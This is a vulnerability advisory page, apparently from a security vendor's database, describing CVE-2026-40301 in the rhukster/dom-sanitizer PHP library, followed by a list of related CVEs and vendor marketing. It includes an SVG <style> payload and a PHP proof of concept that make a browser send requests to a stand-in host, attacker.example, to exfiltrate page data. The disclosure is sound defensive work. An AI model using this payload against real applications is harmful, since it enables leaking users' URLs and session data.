CVE-2026-40301
PHP vulnerability analysis and mitigation

Summary

DOMSanitizer::sanitize() allows <style> elements in SVG content but never inspects their text content. CSS url() references and @import rules pass through unfiltered, causing the browser to issue HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered.

Details

In src/DOMSanitizer.php, 'style' is listed in the SVG allowed-tag array (line 31). The sanitize() method (lines 111–133) removes disallowed tags and strips attributes matching the EXTERNAL_URL pattern — but text node content of <style> elements is never examined. Because CSS rules live in text nodes, EXTERNAL_URL filtering never applies to them. Vulnerable code (src/DOMSanitizer.php, line 31):

'svg' => ['style', 'path', 'rect', 'circle', ...],

The following payload survives sanitize() intact:

<svg xmlns="http://www.w3.org/2000/svg">
  <style>* { background: url(https://attacker.example/collect); }</style>
</svg>

PoC

<?php
require 'vendor/autoload.php';
use Rhukster\DomSanitizer\DOMSanitizer;
$svg = '<svg xmlns="http://www.w3.org/2000/svg"><style>* { background: url(https://attacker.example/collect); }</style></svg>';
$sanitizer = new DOMSanitizer(DOMSanitizer::SVG);
$output = $sanitizer->sanitize($svg);
echo $output; // <style> with url() survives unchanged — confirmed exploitable in Statamic CMS (GHSA-g8hv-8w5p-cvqg)

Render the returned string in a browser. The browser sends a GET request to https://attacker.example/collect.

Impact

Any application that passes user-controlled SVG through DOMSanitizer::sanitize() and renders the output in a browser is vulnerable. An attacker can exfiltrate the page URL to an external server, load arbitrary external stylesheets, and on some browsers leverage CSS attribute selectors + url() to exfiltrate cookie or session token values.


SourceNVD

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-39976HIGH7.1
  • PHPPHP
  • laravel/passport
NoYesApr 09, 2026
CVE-2026-40301MEDIUM4.7
  • PHPPHP
  • rhukster/dom-sanitizer
NoYesApr 10, 2026
CVE-2026-40194LOW3.7
  • PHPPHP
  • php-phpseclib
NoYesApr 10, 2026
GHSA-xq4j-g85q-wf97LOW2.1
  • PHPPHP
  • redaxo/source
NoYesApr 10, 2026
GHSA-m662-8jrj-cw6vLOW2.1
  • PHPPHP
  • redaxo/source
NoYesApr 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management